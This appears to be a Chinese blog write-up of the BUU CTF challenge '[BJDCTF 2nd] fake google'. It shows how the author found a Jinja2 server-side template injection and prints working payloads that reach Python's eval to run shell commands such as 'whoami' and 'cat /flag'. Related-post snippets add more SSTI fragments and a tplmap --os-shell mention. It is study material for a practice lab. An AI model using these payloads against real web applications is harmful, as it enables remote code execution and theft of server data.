【学习笔记2】buu [BJDCTF 2nd]fake google

最新推荐文章于 2020-11-08 22:11:26 发布
最新推荐文章于 2020-11-08 22:11:26 发布
阅读量220 收藏 1
点赞数 1
分类专栏: ctf 学习笔记 文章标签: java python 列表 tensorflow c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43553654/article/details/107686884
版权
 
 

点进去一看什么都没有,在搜索栏随便敲了个1上去,搜索一下

 

 
 

查看源码

<!--ssssssti & a little trick --> P3's girlfirend is : 1<br><hr>

这提示简直不要更明显就是SSTI

继续输入{{7*7}},发现给出了49的运算结果,怎么这么像我之前看到的flask模板注入呢。

执行我之前搜集的payload

{{().__class__.__bases__[0].__subclasses__()}} //查看可用模块

{{().__class__.base__.__subclasses__().index(warnings.catch_warnings)}}//本来想用这条命令直接查找危险函数 ,结果不让用只好手动数一数

{{().__class__.__bases__[0].__subclasses__()[169].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}}//找到危险函数后构造payload尝试执行命令,发现可以,构造最终答案

{{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}//可以直接查到flag竟然没有过滤

配上相关函数的解释

__class__ 返回类型所属的对象

__subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表

__init__ 类的初始化方法

__globals__ 对包含函数全局变量的字典的引用

__mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。

__bases__ 返回该对象所继承的基类 __builtins__是做为默认初始模块

关于flask模板注入的详情,可以去看我之前写的博客

https://www.jianshu.com/p/e341b7b7d4f3

后来看到有的wp上说这道题可以tplmap一把梭,但是不知道为什么我没有跑出来。

Noslpum
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BJDCTF 2nd]fake google
ChenZIDu的博客
03-28 1832
上周BJDCTF有一道ssti注入题,当时瞎猫碰上死耗子,给我撞过去了。对Python,平常也没有C++java用的频繁,记录一下正常思路。顺便学习一下,以后遇到了不能光靠运气撞过去了= = 一些简单注入 {{config}}可以获取当前设置 {{self}} {{self.__dict__._TemplateReference__context.config}} 同样可以看到config ...
BUUCTF__[BJDCTF 2nd]fake google_题解
风过江南乱的博客
07-16 745
SSTI/沙盒逃逸详细总结 SSTI模板注入 服务端模板注入攻击
[BJDCTF 2nd]fake google 1
weixin_45674567的博客
04-22 511
参考文章https://blog.csdn.net/u011377996/article/details/86776181 确定模块注入: 具体网址内容: http://abcfb0f6-5bad-49f4-aadd-115d99530dba.node3.buuoj.cn/qaq?name={%%20for%20c%20in%20[].class.base.subclasses()%20%...
BUUCTF:[BJDCTF 2nd]fake google
末初的CSDN博客
11-08 408
https://buuoj.cn/challenges#[BJDCTF%202nd]fake%20google 查看页面源代码 SSTI注入 Tplmap一把梭直接拿下 Tplmap项目地址:https://github.com/epinna/tplmap python2 .\tplmap.py -u "http://7917ad55-85e8-4fec-99db-55e2a05a3cd3.node3.buuoj.cn/qaq?name=mochu" 模板是Jinja2,直接--os-shel
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
POSN:POSN-BUU的源代码
04-01
7. **第三方库**:C++生态系统中有许多优秀的第三方库,如Boost、Eigen(用于线性代数计算)、Google Protocol Buffers(用于数据序列化)等,POSN-BUU可能依赖其中的一些进行开发。 8. **编译与构建工具**:项目...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
[buuoj][BJDCTF 2nd]fake google
qq_42250840的博客
07-14 373
知识点: ssti注入 ssti注入又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。 它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不 严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题。 复现: 进去页面,随便输入一个数: 查看源码: 发现提示ssti注入,构造payload: {% for
[BJDCTF 2nd]fake google -wp
freerats的博客
06-29 223
打开后一个google搜索框,查看源码没什么,随便输入点东西搜索 查看源码,提示ssti 测试一下,存在ssti 1 、获取字符串的类对象 ''.__class__ 2 、寻找基类 ''.__class__.__mro__ 3 、寻找可用引用 ''.__class__.__mro__[1].__subclasses__() 在最后面发现模块引擎类型 <class ‘jinja2.ext.Extension’>, <class ‘jinja2.ext._CommentFinder’
BUU BJDCTF fake google(ssti模板注入) write up 随便学习模板注入
tothemoon的博客
03-31 522
发现提示!,模板注入无疑了 验证一下 寻找object基类 "".__class__.__bases__ 或 "".__class__.__mro__ 找到os方法 "".__class__.__mro__[1].__subclasses__()[117] 用.init.globals查找os,init初始化类,globals全局查找方法变量参数 "".__class__._...
模板注入(SSTI)攻击(jinja2)
热门推荐
钞sir的博客
10-04 2万+
和常见Web注入(SQL注入等)的成因一样,也是服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。(web安全中的真理:永远不要相信用户的输入) 以一道CTF为例,简单演示一下注入的流程及一些被过滤了的命令的构造方法; 首先打...
some little trick
WriteHappy的专栏
01-25 476
1. Open application event viewer:    just  input view2. Adding QRDT LADT counter:    add counters->OLS Local store->Number of Records->ALL.QRDTStore and ALL.LADTStore
BJDCTF 2nd-WP
luoluopeach
03-23 714
Crypto 1.签到-y1ng 直接base64解码 QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ== flag:BJD{W3lc0me_T0_BJDCTF} 2.老文盲了 将文字转化为拼音可以知道文字就是flag flag:BJD{罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝} 3.cat_flag ...
re学习笔记(53)BUUCTF-re-[BJDCTF 2nd]guessgame | 8086
逆向随笔
03-23 2660
新手一枚,如有错误(不足)请指正,谢谢!! 个人博客:点击进入/点击进入 [BJDCTF 2nd]guessgame 题目链接:点击进入 IDA载入,shift+F12搜索字符串,即可得到flag 得到flag为BJD{S1mple_ReV3r5e_W1th_0D_0r_IDA} (刚开始没查找字符串,傻乎乎的看了主代码没找到flag,然后又去看了会在main函数前执行的pre_c_init和p...
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值